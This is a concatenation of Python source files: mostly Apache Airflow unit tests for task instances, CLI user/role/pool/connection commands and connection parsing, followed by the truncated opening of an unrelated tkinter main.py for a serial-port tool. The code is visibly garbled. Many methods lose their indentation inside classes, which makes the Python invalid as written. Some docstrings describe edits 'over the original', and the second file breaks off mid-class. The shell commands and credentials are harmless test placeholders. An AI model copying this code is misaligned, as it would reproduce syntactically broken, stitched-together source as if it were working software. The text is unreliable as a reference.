assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
    def test_terminate_task(self):
        """If a task instance's db state get deleted, it should fail"""
        TI = TaskInstance
        dag = self.dagbag.dags.get('test_utils')
        task = dag.task_dict.get('sleeps_forever')

        ti = TI(task=task, execution_date=DEFAULT_DATE)
        job = jobs.LocalTaskJob(
            task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())

        # Running task instance asynchronously
        p = multiprocessing.Process(target=job.run)
        p.start()
        # Give the child process time to start the task before checking.
        sleep(5)
        settings.engine.dispose()
        session = settings.Session()
        ti.refresh_from_db(session=session)
        # making sure it's actually running
        self.assertEqual(State.RUNNING, ti.state)
        ti = session.query(TI).filter_by(
            dag_id=task.dag_id,
            task_id=task.task_id,
            execution_date=DEFAULT_DATE
        ).one()

        # deleting the instance should result in a failure
        session.delete(ti)
        session.commit()
        # waiting for the async task to finish
        p.join()

        # making sure that the task ended up as failed
        ti.refresh_from_db(session=session)
        self.assertEqual(State.FAILED, ti.state)
        session.close()
    def test_task_fail_duration(self):
        """If a task fails, the duration should be recorded in TaskFail"""

        p = BashOperator(
            task_id='pass_sleepy',
            bash_command='sleep 3',
            dag=self.dag)
        # 5s sleep with a 3s timeout is guaranteed to fail.
        f = BashOperator(
            task_id='fail_sleepy',
            bash_command='sleep 5',
            execution_timeout=timedelta(seconds=3),
            retry_delay=timedelta(seconds=0),
            dag=self.dag)
        session = settings.Session()
        # Best-effort runs: failures are expected and inspected via the
        # TaskFail table below rather than via exceptions.
        try:
            p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:
            pass
        try:
            f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
        except Exception:
            pass
        p_fails = session.query(TaskFail).filter_by(
            task_id='pass_sleepy',
            dag_id=self.dag.dag_id,
            execution_date=DEFAULT_DATE).all()
        f_fails = session.query(TaskFail).filter_by(
            task_id='fail_sleepy',
            dag_id=self.dag.dag_id,
            execution_date=DEFAULT_DATE).all()

        # Only the timed-out task may produce a TaskFail row, and its
        # recorded duration must cover at least the 3s timeout window.
        self.assertEqual(0, len(p_fails))
        self.assertEqual(1, len(f_fails))
        self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
    def test_run_command(self):
        """run_command returns decoded stdout and raises on non-zero exit."""
        # Emit a non-ASCII character to exercise UTF-8 decoding of stdout.
        write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
        cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)

        self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')

        self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
        # A failing command surfaces as AirflowConfigException.
        self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
    def test_externally_triggered_dagrun(self):
        """For an externally triggered run, next_ds/prev_ds collapse to the
        run's own execution date instead of the schedule's neighbors."""
        TI = TaskInstance

        # Create the dagrun between two "scheduled" execution dates of the DAG
        EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
        EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
        EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')

        dag = DAG(
            TEST_DAG_ID,
            default_args=self.args,
            schedule_interval=timedelta(weeks=1),
            start_date=DEFAULT_DATE)
        task = DummyOperator(task_id='test_externally_triggered_dag_context',
                             dag=dag)
        dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
                          execution_date=EXECUTION_DATE,
                          state=State.RUNNING,
                          external_trigger=True)
        task.run(
            start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)

        ti = TI(task=task, execution_date=EXECUTION_DATE)
        context = ti.get_template_context()

        # next_ds/prev_ds should be the execution date for manually triggered runs
        self.assertEqual(context['next_ds'], EXECUTION_DS)
        self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)

        self.assertEqual(context['prev_ds'], EXECUTION_DS)
        self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class TestCli(unittest.TestCase):
TEST_USER1_EMAIL = 'test-user1@example.com'
TEST_USER2_EMAIL = 'test-user2@example.com'
    @classmethod
    def setUpClass(cls):
        """Purge leftover Pool/Variable rows before any test in this class."""
        super().setUpClass()
        cls._cleanup()
    def setUp(self):
        """Build a testing Flask app, a CLI parser and a DagBag of examples."""
        super().setUp()
        from airflow.www import app as application
        self.app, self.appbuilder = application.create_app(session=Session, testing=True)
        self.app.config['TESTING'] = True

        self.parser = cli.CLIFactory.get_parser()
        self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
        settings.configure_orm()
        self.session = Session
    def tearDown(self):
        """Remove test users, test roles and Pool/Variable rows."""
        self._cleanup(session=self.session)
        for email in [self.TEST_USER1_EMAIL, self.TEST_USER2_EMAIL]:
            test_user = self.appbuilder.sm.find_user(email=email)
            if test_user:
                self.appbuilder.sm.del_register_user(test_user)
        for role_name in ['FakeTeamA', 'FakeTeamB']:
            if self.appbuilder.sm.find_role(role_name):
                self.appbuilder.sm.delete_role(role_name)
        super().tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(Pool).delete()
session.query(Variable).delete()
session.commit()
session.close()
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test1', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@foo.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test2', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@apache.org', '--role', 'Viewer', '--password', 'test'
])
cli.users_create(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'users', 'create', '--username', 'test3', '--lastname', 'doe',
'--firstname', 'jon',
'--email', 'jdoe@example.com', '--role', 'Viewer', '--use_random_password'
])
cli.users_create(args)
args = self.parser.parse_args([
'users', 'delete', '--username', 'test3',
])
cli.users_delete(args)
    def test_cli_list_users(self):
        """`users list` prints every username created via the CLI."""
        for i in range(0, 3):
            args = self.parser.parse_args([
                'users', 'create', '--username', 'user{}'.format(i), '--lastname',
                'doe', '--firstname', 'jon',
                '--email', 'jdoe+{}@gmail.com'.format(i), '--role', 'Viewer',
                '--use_random_password'
            ])
            cli.users_create(args)
        # Capture stdout to inspect the listing output.
        with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
            cli.users_list(self.parser.parse_args(['users', 'list']))
            stdout = mock_stdout.getvalue()
        for i in range(0, 3):
            self.assertIn('user{}'.format(i), stdout)
def test_cli_list_users_with_args(self):
cli.users_list(self.parser.parse_args(['users', 'list',
'--output', 'tsv']))
    def test_cli_import_users(self):
        """`users import` creates users and re-importing replaces roles."""
        def assertUserInRoles(email, roles):
            for role in roles:
                self.assertTrue(self._does_user_belong_to_role(email, role))

        def assertUserNotInRoles(email, roles):
            for role in roles:
                self.assertFalse(self._does_user_belong_to_role(email, role))

        assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
        assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
        users = [
            {
                "username": "imported_user1", "lastname": "doe1",
                "firstname": "jon", "email": self.TEST_USER1_EMAIL,
                "roles": ["Admin", "Op"]
            },
            {
                "username": "imported_user2", "lastname": "doe2",
                "firstname": "jon", "email": self.TEST_USER2_EMAIL,
                "roles": ["Public"]
            }
        ]
        self._import_users_from_file(users)

        assertUserInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
        assertUserInRoles(self.TEST_USER2_EMAIL, ['Public'])

        # Re-import the same users with swapped roles: import must replace
        # the previous role assignments, not merge with them.
        users = [
            {
                "username": "imported_user1", "lastname": "doe1",
                "firstname": "jon", "email": self.TEST_USER1_EMAIL,
                "roles": ["Public"]
            },
            {
                "username": "imported_user2", "lastname": "doe2",
                "firstname": "jon", "email": self.TEST_USER2_EMAIL,
                "roles": ["Admin"]
            }
        ]
        self._import_users_from_file(users)

        assertUserNotInRoles(self.TEST_USER1_EMAIL, ['Admin', 'Op'])
        assertUserInRoles(self.TEST_USER1_EMAIL, ['Public'])
        assertUserNotInRoles(self.TEST_USER2_EMAIL, ['Public'])
        assertUserInRoles(self.TEST_USER2_EMAIL, ['Admin'])
    def test_cli_export_users(self):
        """`users export` emits JSON that round-trips through `users import`."""
        user1 = {"username": "imported_user1", "lastname": "doe1",
                 "firstname": "jon", "email": self.TEST_USER1_EMAIL,
                 "roles": ["Public"]}
        user2 = {"username": "imported_user2", "lastname": "doe2",
                 "firstname": "jon", "email": self.TEST_USER2_EMAIL,
                 "roles": ["Admin"]}
        self._import_users_from_file([user1, user2])

        users_filename = self._export_users_to_file()
        with open(users_filename, mode='r') as file:
            retrieved_users = json.loads(file.read())
        os.remove(users_filename)

        # ensure that an export can be imported
        self._import_users_from_file(retrieved_users)

        def find_by_username(username):
            matches = [u for u in retrieved_users
                       if u['username'] == username]
            if not matches:
                self.fail("Couldn't find user with username {}".format(username))
            else:
                matches[0].pop('id')  # this key not required for import
                return matches[0]

        # The exported records (minus the db id) must equal the originals.
        self.assertEqual(find_by_username('imported_user1'), user1)
        self.assertEqual(find_by_username('imported_user2'), user2)
def _import_users_from_file(self, user_list):
json_file_content = json.dumps(user_list)
f = NamedTemporaryFile(delete=False)
try:
f.write(json_file_content.encode())
f.flush()
args = self.parser.parse_args([
'users', 'import', f.name
])
cli.users_import(args)
finally:
os.remove(f.name)
def _export_users_to_file(self):
f = NamedTemporaryFile(delete=False)
args = self.parser.parse_args([
'users', 'export', f.name
])
cli.users_export(args)
return f.name
def _does_user_belong_to_role(self, email, rolename):
user = self.appbuilder.sm.find_user(email=email)
role = self.appbuilder.sm.find_role(rolename)
if user and role:
return role in user.roles
return False
    def test_cli_add_user_role(self):
        """`users add_role` grants an additional role to an existing user."""
        args = self.parser.parse_args([
            'users', 'create', '--username', 'test4', '--lastname', 'doe',
            '--firstname', 'jon',
            '--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
        ])
        cli.users_create(args)

        self.assertFalse(
            self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
                                           rolename='Op'),
            "User should not yet be a member of role 'Op'"
        )

        args = self.parser.parse_args([
            'users', 'add_role', '--username', 'test4', '--role', 'Op'
        ])
        cli.users_manage_role(args, remove=False)

        self.assertTrue(
            self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
                                           rolename='Op'),
            "User should have been added to role 'Op'"
        )
    def test_cli_remove_user_role(self):
        """`users remove_role` revokes a role a user currently holds."""
        args = self.parser.parse_args([
            'users', 'create', '--username', 'test4', '--lastname', 'doe',
            '--firstname', 'jon',
            '--email', self.TEST_USER1_EMAIL, '--role', 'Viewer', '--use_random_password'
        ])
        cli.users_create(args)

        self.assertTrue(
            self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
                                           rolename='Viewer'),
            "User should have been created with role 'Viewer'"
        )

        args = self.parser.parse_args([
            'users', 'remove_role', '--username', 'test4', '--role', 'Viewer'
        ])
        cli.users_manage_role(args, remove=True)

        self.assertFalse(
            self._does_user_belong_to_role(email=self.TEST_USER1_EMAIL,
                                           rolename='Viewer'),
            "User should have been removed from role 'Viewer'"
        )
    @mock.patch("airflow.bin.cli.DagBag")
    def test_cli_sync_perm(self, dagbag_mock):
        """`sync_perm` syncs global roles once and per-DAG permissions for
        every DAG in the bag (None when a DAG has no access_control)."""
        self.expect_dagbag_contains([
            DAG('has_access_control',
                access_control={
                    'Public': {'can_dag_read'}
                }),
            DAG('no_access_control')
        ], dagbag_mock)
        # Replace the security manager so the calls can be asserted on.
        self.appbuilder.sm = mock.Mock()

        args = self.parser.parse_args([
            'sync_perm'
        ])
        cli.sync_perm(args)

        assert self.appbuilder.sm.sync_roles.call_count == 1

        self.assertEqual(2,
                         len(self.appbuilder.sm.sync_perm_for_dag.mock_calls))
        self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
            'has_access_control',
            {'Public': {'can_dag_read'}}
        )
        self.appbuilder.sm.sync_perm_for_dag.assert_any_call(
            'no_access_control',
            None,
        )
def expect_dagbag_contains(self, dags, dagbag_mock):
    """Make the patched DagBag return a bag holding exactly *dags*."""
    bag = mock.Mock()
    bag.dags = {dag.dag_id: dag for dag in dags}
    dagbag_mock.return_value = bag
def test_cli_create_roles(self):
    """`roles create` creates every role named on the command line."""
    for name in ('FakeTeamA', 'FakeTeamB'):
        self.assertIsNone(self.appbuilder.sm.find_role(name))

    cli.roles_create(self.parser.parse_args(
        ['roles', 'create', 'FakeTeamA', 'FakeTeamB']))

    for name in ('FakeTeamA', 'FakeTeamB'):
        self.assertIsNotNone(self.appbuilder.sm.find_role(name))
def test_cli_create_roles_is_reentrant(self):
    """Running `roles create` twice with the same names must not fail.

    Fix: the original invoked the command only once, making this test an
    exact duplicate of ``test_cli_create_roles`` that never exercised
    re-entrancy.  The command is now run a second time to verify that
    creating already-existing roles is a silent no-op.
    """
    self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamA'))
    self.assertIsNone(self.appbuilder.sm.find_role('FakeTeamB'))
    args = self.parser.parse_args([
        'roles', 'create', 'FakeTeamA', 'FakeTeamB'
    ])
    cli.roles_create(args)
    # Second run against roles that now exist: must succeed without error.
    cli.roles_create(args)
    self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamA'))
    self.assertIsNotNone(self.appbuilder.sm.find_role('FakeTeamB'))
def test_cli_list_roles(self):
    """`roles list` prints every known role name."""
    for name in ('FakeTeamA', 'FakeTeamB'):
        self.appbuilder.sm.add_role(name)
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
        cli.roles_list(self.parser.parse_args(['roles', 'list']))
    output = mock_stdout.getvalue()
    self.assertIn('FakeTeamA', output)
    self.assertIn('FakeTeamB', output)
def test_cli_list_roles_with_args(self):
    """`roles list --output tsv` runs without raising."""
    args = self.parser.parse_args(['roles', 'list', '--output', 'tsv'])
    cli.roles_list(args)

@mock.patch("airflow.bin.cli.db.initdb")
def test_cli_initdb(self, initdb_mock):
    """`db init` delegates to db.initdb exactly once."""
    cli.initdb(self.parser.parse_args(['db', 'init']))
    initdb_mock.assert_called_once_with()

@mock.patch("airflow.bin.cli.db.resetdb")
def test_cli_resetdb(self, resetdb_mock):
    """`db reset --yes` delegates to db.resetdb exactly once."""
    cli.resetdb(self.parser.parse_args(['db', 'reset', '--yes']))
    resetdb_mock.assert_called_once_with()
def test_cli_connections_list(self):
    """`connections list` includes the default connections in its table."""
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
        cli.connections_list(self.parser.parse_args(['connections', 'list']))
        stdout = mock_stdout.getvalue()
    # Every other line of the rendered table holds a data row; pull the
    # first two quoted fields (conn_id, conn_type) from each such line.
    rows = []
    for line_no, line in enumerate(stdout.split('\n')):
        if line_no % 2 != 1:
            continue
        fields = [token.strip("'") for token in re.findall(r"'\w+'", line)[:2]]
        if fields:
            rows.append(fields)
    # Assert that some of the connections are present in the output as
    # expected:
    for expected_row in (
        ['aws_default', 'aws'],
        ['hive_cli_default', 'hive_cli'],
        ['emr_default', 'emr'],
        ['mssql_default', 'mssql'],
        ['mysql_default', 'mysql'],
        ['postgres_default', 'postgres'],
        ['wasb_default', 'wasb'],
        ['segment_default', 'segment'],
    ):
        self.assertIn(expected_row, rows)

def test_cli_connections_list_with_args(self):
    """`connections list --output tsv` runs without raising."""
    cli.connections_list(self.parser.parse_args(
        ['connections', 'list', '--output', 'tsv']))

def test_cli_connections_list_redirect(self):
    """`airflow connections list` works with stdout redirected to a file."""
    with tempfile.TemporaryFile() as fp:
        proc = subprocess.Popen(['airflow', 'connections', 'list'], stdout=fp)
        proc.wait()
        self.assertEqual(0, proc.returncode)
def test_cli_connections_add_delete(self):
    """End-to-end check of `connections add` and `connections delete`.

    Covers adding via URI, via discrete --conn_* fields, with extras,
    duplicate detection, the missing-argument error, database state
    after each step, and deletion (including of a missing conn_id).
    """
    # Add connections:
    uri = 'postgresql://airflow:airflow@host:5432/airflow'
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
        cli.connections_add(self.parser.parse_args(
            ['connections', 'add', 'new1',
             '--conn_uri=%s' % uri]))
        cli.connections_add(self.parser.parse_args(
            ['connections', 'add', 'new2',
             '--conn_uri=%s' % uri]))
        # new3/new4: URI plus a free-form --conn_extra payload.
        cli.connections_add(self.parser.parse_args(
            ['connections', 'add', 'new3',
             '--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
        cli.connections_add(self.parser.parse_args(
            ['connections', 'add', 'new4',
             '--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
        # new5: built from discrete fields instead of a URI.
        cli.connections_add(self.parser.parse_args(
            ['connections', 'add', 'new5',
             '--conn_type=hive_metastore', '--conn_login=airflow',
             '--conn_password=airflow', '--conn_host=host',
             '--conn_port=9083', '--conn_schema=airflow']))
        # new6: empty URI but an explicit type and extras.
        cli.connections_add(self.parser.parse_args(
            ['connections', 'add', 'new6',
             '--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
        stdout = mock_stdout.getvalue()

    # Check addition stdout
    lines = [l for l in stdout.split('\n') if len(l) > 0]
    self.assertListEqual(lines, [
        ("\tSuccessfully added `conn_id`=new1 : " +
         "postgresql://airflow:airflow@host:5432/airflow"),
        ("\tSuccessfully added `conn_id`=new2 : " +
         "postgresql://airflow:airflow@host:5432/airflow"),
        ("\tSuccessfully added `conn_id`=new3 : " +
         "postgresql://airflow:airflow@host:5432/airflow"),
        ("\tSuccessfully added `conn_id`=new4 : " +
         "postgresql://airflow:airflow@host:5432/airflow"),
        ("\tSuccessfully added `conn_id`=new5 : " +
         "hive_metastore://airflow:airflow@host:9083/airflow"),
        ("\tSuccessfully added `conn_id`=new6 : " +
         "google_cloud_platform://:@:")
    ])

    # Attempt to add duplicate
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
        cli.connections_add(self.parser.parse_args(
            ['connections', 'add', 'new1',
             '--conn_uri=%s' % uri]))
        stdout = mock_stdout.getvalue()

    # Check stdout for addition attempt
    lines = [l for l in stdout.split('\n') if len(l) > 0]
    self.assertListEqual(lines, [
        "\tA connection with `conn_id`=new1 already exists",
    ])

    # Attempt to add without providing conn_uri
    with self.assertRaises(SystemExit) as exc:
        cli.connections_add(self.parser.parse_args(
            ['connections', 'add', 'new']))
    self.assertEqual(
        exc.exception.code,
        "The following args are required to add a connection: ['conn_uri or conn_type']"
    )

    # Prepare to verify the added connections in the database.
    session = settings.Session()
    # Expected extras per conn_id (None when --conn_extra was not given).
    extra = {'new1': None,
             'new2': None,
             'new3': "{'extra': 'yes'}",
             'new4': "{'extra': 'yes'}"}

    # Check each added connection's persisted fields.
    for index in range(1, 6):
        conn_id = 'new%s' % index
        result = (session
                  .query(Connection)
                  .filter(Connection.conn_id == conn_id)
                  .first())
        result = (result.conn_id, result.conn_type, result.host,
                  result.port, result.get_extra())
        if conn_id in ['new1', 'new2', 'new3', 'new4']:
            self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
                                      extra[conn_id]))
        elif conn_id == 'new5':
            self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
                                      9083, None))
        elif conn_id == 'new6':
            self.assertEqual(result, (conn_id, 'google_cloud_platform',
                                      None, None, "{'extra': 'yes'}"))

    # Delete connections
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
        cli.connections_delete(self.parser.parse_args(
            ['connections', 'delete', 'new1']))
        cli.connections_delete(self.parser.parse_args(
            ['connections', 'delete', 'new2']))
        cli.connections_delete(self.parser.parse_args(
            ['connections', 'delete', 'new3']))
        cli.connections_delete(self.parser.parse_args(
            ['connections', 'delete', 'new4']))
        cli.connections_delete(self.parser.parse_args(
            ['connections', 'delete', 'new5']))
        cli.connections_delete(self.parser.parse_args(
            ['connections', 'delete', 'new6']))
        stdout = mock_stdout.getvalue()

    # Check deletion stdout
    lines = [l for l in stdout.split('\n') if len(l) > 0]
    self.assertListEqual(lines, [
        "\tSuccessfully deleted `conn_id`=new1",
        "\tSuccessfully deleted `conn_id`=new2",
        "\tSuccessfully deleted `conn_id`=new3",
        "\tSuccessfully deleted `conn_id`=new4",
        "\tSuccessfully deleted `conn_id`=new5",
        "\tSuccessfully deleted `conn_id`=new6"
    ])

    # Check deletions
    for index in range(1, 7):
        conn_id = 'new%s' % index
        result = (session.query(Connection)
                  .filter(Connection.conn_id == conn_id)
                  .first())
        self.assertTrue(result is None)

    # Attempt to delete a non-existing connection
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
        cli.connections_delete(self.parser.parse_args(
            ['connections', 'delete', 'fake']))
        stdout = mock_stdout.getvalue()

    # Check deletion attempt stdout
    lines = [l for l in stdout.split('\n') if len(l) > 0]
    self.assertListEqual(lines, [
        "\tDid not find a connection with `conn_id`=fake",
    ])

    session.close()
def test_process_subdir_path_with_placeholder(self):
    """'DAGS_FOLDER/...' expands relative to the configured DAG folder."""
    expected = os.path.join(settings.DAGS_FOLDER, 'abc')
    self.assertEqual(expected, cli.process_subdir('DAGS_FOLDER/abc'))

def test_pool_list(self):
    """`pools list` shows a pool created via `pools set`."""
    cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
        cli.pool_list(self.parser.parse_args(['pools', 'list']))
    self.assertIn('foo', mock_stdout.getvalue())

def test_pool_list_with_args(self):
    """`pools list --output tsv` runs without raising."""
    cli.pool_list(self.parser.parse_args(['pools', 'list', '--output', 'tsv']))

def test_pool_create(self):
    """`pools set` persists exactly one pool row."""
    cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
    self.assertEqual(self.session.query(Pool).count(), 1)

def test_pool_get(self):
    """`pools get` succeeds for an existing pool."""
    cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
    try:
        cli.pool_get(self.parser.parse_args(['pools', 'get', 'foo']))
    except Exception as e:
        self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)

def test_pool_delete(self):
    """`pools delete` removes the pool row."""
    cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
    cli.pool_delete(self.parser.parse_args(['pools', 'delete', 'foo']))
    self.assertEqual(self.session.query(Pool).count(), 0)
def test_pool_import_export(self):
    """Round-trip pools through `pools import` / `pools export`.

    Fix over the original: the two scratch JSON files are now removed in
    a ``finally`` block, so a failing assertion no longer leaks files
    into the working directory (previously ``os.remove`` was only
    reached on full success).
    """
    # Create two pools first
    pool_config_input = {
        "foo": {
            "description": "foo_test",
            "slots": 1
        },
        "baz": {
            "description": "baz_test",
            "slots": 2
        }
    }
    try:
        with open('pools_import.json', mode='w') as file:
            json.dump(pool_config_input, file)
        # Import json
        try:
            cli.pool_import(self.parser.parse_args(['pools', 'import', 'pools_import.json']))
        except Exception as e:
            self.fail("The 'pool import pools_import.json' failed: %s" % e)
        # Export json
        try:
            cli.pool_export(self.parser.parse_args(['pools', 'export', 'pools_export.json']))
        except Exception as e:
            self.fail("The 'pool export pools_export.json' failed: %s" % e)
        with open('pools_export.json', mode='r') as file:
            pool_config_output = json.load(file)
        self.assertEqual(
            pool_config_input,
            pool_config_output,
            "Input and output pool files are not same")
    finally:
        # Best-effort cleanup; a file may not exist if a step failed early.
        for path in ('pools_import.json', 'pools_export.json'):
            try:
                os.remove(path)
            except OSError:
                pass
def test_cli_version(self):
    """`version` prints the Airflow version string."""
    with mock.patch('sys.stdout', new_callable=io.StringIO) as mock_stdout:
        cli.version(self.parser.parse_args(['version']))
    self.assertIn(version, mock_stdout.getvalue())
class TestConnection(unittest.TestCase):
    """Tests for Connection construction and AIRFLOW_CONN_* env handling."""

    def setUp(self):
        utils.db.initdb()

    @unittest.mock.patch.dict('os.environ', {
        'AIRFLOW_CONN_TEST_URI': 'postgres://username:password@ec2.compute.com:5432/the_database',
    })
    def test_using_env_var(self):
        """A connection URI in the environment is parsed into its parts."""
        conn = SqliteHook.get_connection(conn_id='test_uri')
        self.assertEqual('ec2.compute.com', conn.host)
        self.assertEqual('the_database', conn.schema)
        self.assertEqual('username', conn.login)
        self.assertEqual('password', conn.password)
        self.assertEqual(5432, conn.port)

    @unittest.mock.patch.dict('os.environ', {
        'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
    })
    def test_using_unix_socket_env_var(self):
        """A credential-less URI leaves login/password/port unset."""
        conn = SqliteHook.get_connection(conn_id='test_uri_no_creds')
        self.assertEqual('ec2.compute.com', conn.host)
        self.assertEqual('the_database', conn.schema)
        self.assertIsNone(conn.login)
        self.assertIsNone(conn.password)
        self.assertIsNone(conn.port)

    def test_param_setup(self):
        """Keyword arguments populate the corresponding attributes."""
        conn = Connection(conn_id='local_mysql', conn_type='mysql',
                          host='localhost', login='airflow',
                          password='airflow', schema='airflow')
        self.assertEqual('localhost', conn.host)
        self.assertEqual('airflow', conn.schema)
        self.assertEqual('airflow', conn.login)
        self.assertEqual('airflow', conn.password)
        self.assertIsNone(conn.port)

    def test_env_var_priority(self):
        """An AIRFLOW_CONN_* variable overrides the stored connection."""
        conn = SqliteHook.get_connection(conn_id='airflow_db')
        self.assertNotEqual('ec2.compute.com', conn.host)
        with unittest.mock.patch.dict('os.environ', {
            'AIRFLOW_CONN_AIRFLOW_DB': 'postgres://username:password@ec2.compute.com:5432/the_database',
        }):
            conn = SqliteHook.get_connection(conn_id='airflow_db')
            self.assertEqual('ec2.compute.com', conn.host)
            self.assertEqual('the_database', conn.schema)
            self.assertEqual('username', conn.login)
            self.assertEqual('password', conn.password)
            self.assertEqual(5432, conn.port)

    @unittest.mock.patch.dict('os.environ', {
        'AIRFLOW_CONN_TEST_URI': 'postgres://username:password@ec2.compute.com:5432/the_database',
        'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
    })
    def test_dbapi_get_uri(self):
        """get_hook().get_uri() reproduces the original connection URI."""
        hook = BaseHook.get_connection(conn_id='test_uri').get_hook()
        self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
        hook_no_creds = BaseHook.get_connection(conn_id='test_uri_no_creds').get_hook()
        self.assertEqual('postgres://ec2.compute.com/the_database', hook_no_creds.get_uri())

    @unittest.mock.patch.dict('os.environ', {
        'AIRFLOW_CONN_TEST_URI': 'postgres://username:password@ec2.compute.com:5432/the_database',
        'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
    })
    def test_dbapi_get_sqlalchemy_engine(self):
        """get_sqlalchemy_engine() yields an Engine bound to the URI."""
        hook = BaseHook.get_connection(conn_id='test_uri').get_hook()
        engine = hook.get_sqlalchemy_engine()
        self.assertIsInstance(engine, sqlalchemy.engine.Engine)
        self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))

    @unittest.mock.patch.dict('os.environ', {
        'AIRFLOW_CONN_TEST_URI': 'postgres://username:password@ec2.compute.com:5432/the_database',
        'AIRFLOW_CONN_TEST_URI_NO_CREDS': 'postgres://ec2.compute.com/the_database',
    })
    def test_get_connections_env_var(self):
        """get_connections() returns exactly one env-backed connection."""
        conns = SqliteHook.get_connections(conn_id='test_uri')
        assert len(conns) == 1
        assert conns[0].host == 'ec2.compute.com'
        assert conns[0].schema == 'the_database'
        assert conns[0].login == 'username'
        assert conns[0].password == 'password'
        assert conns[0].port == 5432
# Allow running this test module directly with `python <file>.py`.
if __name__ == '__main__':
    unittest.main()
|
main.py | from tkinter import scrolledtext, ttk
from functions.global_settings import possible_units
from functions.event_logger import EventLogger
from functions.coordinate_mover import CoordinateMover
from functions.serial_reader import SerialReader, get_available_com_ports
from functions.serial_handlers.all_handlers import encoder_data
from functions.online_analyzer import OnlineAnalyzer, get_correction_from_mount
from functions.server import get_web_server
from functions.dec_estimator import DecEstimator
from functions.dec_corrector import DecCorrector
from functions.recent_files_provider import RecentImagesProvider, is_file_fits
from functions.camera_encoder import CameraEncoderGUI
from functions.image_tracker import ImageTrackerGUI
import time
from threading import Thread
import tkinter as tk
class ConnectionManager:
    """Connects the SerialReader to a COM port on a background thread.

    Bug fix over the original: ``_async_connection`` referenced the
    module-level globals ``reader`` and ``serial_thread`` instead of the
    collaborators injected through ``__init__``; it now consistently
    uses ``self._reader`` and ``self._serial_thread``.
    """

    def __init__(self, event_log, r, st, c):
        # Kept for backward compatibility; currently unused.
        self._message = None
        self._logger = event_log
        self._reader = r
        self._serial_thread = st
        self._com_port_choice = c

    def _async_connection(self, chosen_port):
        # Runs on a worker thread because opening the port can block.
        welcome_message = self._reader.connect_to_port(chosen_port)
        self._logger.log_event(f"{welcome_message}\n")
        self._serial_thread.start()

    def connect_to_chosen_port(self):
        """Start connecting to the port currently selected in the GUI."""
        chosen_port = self._com_port_choice.get()
        self._logger.log_event(f"Connecting to port: {chosen_port}\n")
